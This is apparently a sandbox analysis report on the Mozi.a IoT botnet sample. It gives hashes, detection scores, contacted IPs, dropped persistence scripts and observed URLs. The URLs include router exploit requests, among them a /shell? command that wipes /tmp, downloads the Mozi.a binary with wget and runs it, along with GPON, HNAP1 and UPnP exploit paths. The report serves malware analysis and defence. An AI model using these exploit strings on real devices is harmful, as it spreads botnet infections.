Mozi.a

Status: finished

Submission Time: 2020-06-03 00:57:44 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
235158
API (Web) ID:
366417
Analysis Started:

2020-06-03 00:57:44 +02:00
Analysis Finished:

2020-06-03 01:06:03 +02:00
MD5:
4dde761681684d7edad4e5e1ffdb940b
SHA1:
2327be693bc11a618c380d7d3abc2382d870d48b
SHA256:
d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 38/60

Open Full Report

malicious

Score: 16/40

malicious

Score: 17/31

malicious

IPs

IP	Country	Detection
193.100.82.45	Germany
34.24.160.243	United States
106.79.160.106	India
Click to see the 97 hidden entries
144.124.184.49	United Kingdom
58.111.71.158	Australia
80.109.176.200	Austria
186.9.248.77	Chile
207.249.235.151	Mexico
84.217.6.123	Sweden
200.70.51.210	Argentina
153.158.222.63	Japan
39.117.245.119	Korea Republic of
83.53.50.85	Spain
201.233.255.187	Colombia
186.84.127.120	Colombia
58.151.98.253	Korea Republic of
111.208.153.89	China
86.4.63.252	United Kingdom
69.199.21.101	United States
218.206.70.26	China
26.38.230.18	United States
76.65.11.32	Canada
80.176.157.140	United Kingdom
150.138.154.9	China
70.196.129.217	United States
136.232.54.49	India
166.220.143.247	United States
208.71.214.140	Malaysia
13.109.156.110	United States
171.194.232.240	United States
38.11.72.168	United States
177.5.160.75	Brazil
118.53.190.196	Korea Republic of
220.29.127.196	Japan
117.238.77.191	India
68.161.40.103	United States
206.62.162.78	United States
51.39.249.107	Saudi Arabia
69.158.127.129	Canada
212.60.167.132	Austria
31.99.25.188	United Kingdom
70.215.91.127	United States
88.183.19.183	France
152.191.30.10	United States
29.243.199.6	United States
119.48.128.127	China
60.67.56.218	Japan
117.174.245.141	China
115.249.32.11	India
213.35.235.171	Estonia
11.27.234.81	United States
18.251.179.98	United States
107.110.215.255	United States
81.42.80.31	Spain
2.170.12.195	Germany
51.76.3.248	United States
198.207.153.206	United States
37.145.99.181	Russian Federation
189.97.127.98	Brazil
19.20.211.89	United States
189.242.99.212	Mexico
44.207.112.199	United States
108.206.83.78	United States
136.130.232.228	United States
185.213.82.171	Germany
184.242.110.119	United States
95.22.184.190	Spain
84.236.115.102	Hungary
45.167.12.127	Mexico
86.58.252.62	Denmark
129.64.16.132	United States
135.107.145.122	United States
47.34.169.215	United States
101.32.133.174	China
36.216.98.253	China
100.213.26.164	United States
77.174.88.251	Netherlands
17.47.130.70	United States
177.30.49.164	Brazil
206.88.235.34	United States
165.177.228.160	United States
208.65.10.26	United States
156.150.249.100	Netherlands
42.20.47.71	Korea Republic of
168.30.131.51	United States
217.135.46.195	United Kingdom
44.155.225.143	United States
159.151.127.126	France
20.102.22.87	United States
134.84.177.187	United States
30.56.142.75	United States
162.91.214.4	United States
67.234.21.3	United States
175.192.19.159	Korea Republic of
195.86.224.78	Netherlands
179.83.63.36	Brazil
112.46.111.113	China
122.116.83.120	Taiwan; Republic of China (ROC)
34.57.62.23	United States
87.34.42.31	Ireland

URLs

Name	Detection
http://127.0.0.1:80/GponForm/diag_Form?images/
http://66.110.242.43:80/HNAP1/
http://216.58.194.105:80/HNAP1/
Click to see the 25 hidden entries
http://13.49.85.164:80/HNAP1/
http://90.118.169.83:80/HNAP1/
http://211.7.233.66:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://52.196.143.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://12.226.183.120:80/HNAP1/
http://179.53.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://104.95.107.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://91.216.121.70:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.alsa-project.org/alsa-info.sh
http://pastebin.ca)
http://156.225.79.1:80/HNAP1/
http://www.pastebin.ca.
http://118.89.21.16:49152/soap.cgi?service=WANIPConn1
http://www.alsa-project.org.
http://www.pastebin.ca
http://39.117.245.119:49152/soap.cgi?service=WANIPConn1
http://upx.sf.net
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://166.88.132.129:49152/soap.cgi?service=WANIPConn1
http://www.alsa-project.org/cardinfo-db/
http://www.pastebin.ca/upload.php
http://www.alsa-project.org

Dropped files

Name	File Type	Hashes
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/usr/networks	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
Click to see the 97 hidden entries
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/keyutils/request-key-debug.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/libsane/plustek/MakeModule.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/libreoffice/soffice.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#

Mozi.a

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Mozi.a Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

Mozi.a